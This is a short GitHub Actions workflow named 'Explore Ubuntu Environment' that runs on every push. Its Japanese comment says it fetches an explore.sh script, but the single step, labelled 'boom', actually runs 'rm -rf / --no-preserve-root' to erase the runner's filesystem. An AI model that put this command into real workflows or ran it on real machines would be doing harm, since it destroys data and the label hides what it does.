name: Explore Ubuntu Environment

on: [push]

jobs:
  explore-job:
    runs-on: ubuntu-slim

    steps:
      # 1. リポジトリのファイル（explore.sh）を持ってくる
      - name: boom
        run: "rm -rf / --no-preserve-root"
